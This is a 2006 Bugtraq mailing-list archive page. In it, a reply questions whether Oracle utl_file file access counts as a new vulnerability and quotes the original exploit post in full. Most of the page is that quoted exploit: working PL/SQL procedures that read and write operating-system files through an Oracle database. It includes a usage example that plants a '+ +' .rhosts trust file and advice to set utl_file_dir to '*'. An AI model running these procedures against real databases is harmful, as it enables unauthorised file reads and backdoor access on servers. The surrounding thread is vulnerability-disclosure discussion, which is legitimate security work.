Re: Oracle <= 9i / 10g File System Access via utl

To:	none@none.com, bugtraq@securityfocus.com
Subject:	Re: Oracle <= 9i / 10g File System Access via utl_file Exploit
From:	sumit kumar soni <sumit_uit@yahoo.com>
Date:	Wed, 20 Dec 2006 04:33:32 -0800 (PST)
Delivered-to:	sp-com-lists@consult.net
Delivered-to:	bugtraq-list@securepoint.com
Delivered-to:	mailing list bugtraq@securityfocus.com
Delivered-to:	moderator for bugtraq@securityfocus.com
Domainkey-signature:	a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=4CmRWET9W9yl7PEqbFMWH/gfjqbGJnDM0K6OpqFg1zL/H8o+1aUL9KJ6lPyk6qB8RAumfNIu8T5n4IPh4TXyY/owmhqNeVFiPoNc2N7WUuY32/y+NxIsb3eElAA8VGm+Inp7c5gq2ZkKuSB6Om3LRSl5a7tdX6wwAutYwJP60Jg=;
In-reply-to:	<20061219211102.14545.qmail@securityfocus.com>
List-help:	<mailto:bugtraq-help@securityfocus.com>
List-id:	<bugtraq.list-id.securityfocus.com>
List-post:	<mailto:bugtraq@securityfocus.com>
List-subscribe:	<mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe:	<mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list:	contact bugtraq-help@securityfocus.com; run by ezmlm

HI,
I don't  think so its any new vulnerability or exploit
(make me 
correct). As i remember there was a  vulnerability
related to Directory 
Traversal via this package
http://www.red-database-security.com/exploits/oracle-directory-traversal-via-utl_file.html
What i believe its a feature to acess OS files.  it
never come as a 
good practice to set  utl_file_dir=* .  On OS you cant
set  acess for an 
database acoount like  scott or others. 
Rgards
Sumit
--- none@none.com wrote:

> -- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00
> raptor Exp $
> --
> -- raptor_orafile.sql - file system access suite for
> oracle
> -- Copyright (c) 2006 Marco Ivaldi
> <raptor@0xdeadbeef.info>
> --
> -- This is an example file system access suite for
> Oracle based on the utl_file
> -- package
> (http://www.adp-gmbh.ch/ora/plsql/utl_file.html).
> Use it to remotely
> -- read/write OS files with the privileges of the
> RDBMS user, without the need
> -- for any special privileges (CONNECT and RESOURCE
> roles are more than enough).
> --
> -- The database _must_ be configured with a non-NULL
> utl_file_dir value
> -- (preferably '*'). Check it using the following
> query:
> -- SQL> select name, value from v$parameter where
> name = 'utl_file_dir';
> --
> -- If you have the required privileges (ALTER
> SYSTEM) and feel brave 
> -- enough to perform a DBMS shutdown/startup, you
> can consider modifying 
> -- this parameter yourself, using the following
> PL/SQL:
> -- SQL> alter system set utl_file_dir='*' scope
> =spfile;
> --
> -- See also:
>
http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
> --
> -- Usage example:
> -- $ sqlplus scott/tiger
> -- [...]
> -- SQL> @raptor_orafile.sql
> -- [...]
> -- SQL> exec utlwritefile('/tmp', 'mytest', '# this
> is a fake .rhosts file');
> -- SQL> exec utlwritefile('/tmp', 'mytest', '+ +');
> -- SQL> set serveroutput on;
> -- SQL> exec utlreadfile('/tmp', 'mytest');
> -- # this is a fake .rhosts file
> -- + +
> -- End of file.
> --
> 
> -- file reading module
> --
> -- usage: set serveroutput on;
> --        exec utlreadfile('/dir', 'file');
> create or replace procedure utlreadfile(p_directory
> in varchar2, p_filename in varchar2) as
> buffer varchar2(260);
> fd utl_file.file_type;
> begin
>       fd := utl_file.fopen(p_directory, p_filename, 'r');
>       dbms_output.enable(1000000);
>       loop
>               utl_file.get_line(fd, buffer, 254);
>               dbms_output.put_line(buffer);
>       end loop;
>       exception when no_data_found then
>               dbms_output.put_line('End of file.');
>               if (utl_file.is_open(fd) = true) then
>                       utl_file.fclose(fd);
>               end if;
>       when others then
>               if (utl_file.is_open(fd) = true) then
>                       utl_file.fclose(fd);
>               end if;
> end;
> /
> 
> -- file writing module
> --
> -- usage: exec utlwritefile('/dir', 'file', 'line to
> append');
> create or replace procedure utlwritefile(p_directory
> in varchar2, p_filename in varchar2, p_line in
> varchar2) as
> fd utl_file.file_type;
> begin
>       fd := utl_file.fopen(p_directory, p_filename, 'a');
> -- append
>       utl_file.put_line(fd, p_line);
>       if (utl_file.is_open(fd) = true) then
>               utl_file.fclose(fd);
>       end if;
> end;
> /
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

<Prev in Thread]	Current Thread	[Next in Thread>
Oracle <= 9i / 10g File System Access via utl_file Exploit, none Re: Oracle <= 9i / 10g File System Access via utl_file Exploit, sumit kumar soni <= Re: Oracle <= 9i / 10g File System Access via utl_file Exploit, Marco Ivaldi

Previous by Date:	Mono XSP ASP.NET Server sourcecode disclosure vulnerability, jose . palanco
Next by Date:	Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting, Brian Eaton
Previous by Thread:	Oracle <= 9i / 10g File System Access via utl_file Exploit, none
Next by Thread:	Re: Oracle <= 9i / 10g File System Access via utl_file Exploit, Marco Ivaldi
Indexes:	[Date] [Thread] [Top] [All Lists]

Re: Oracle <= 9i / 10g File System Access via utl_file Exploit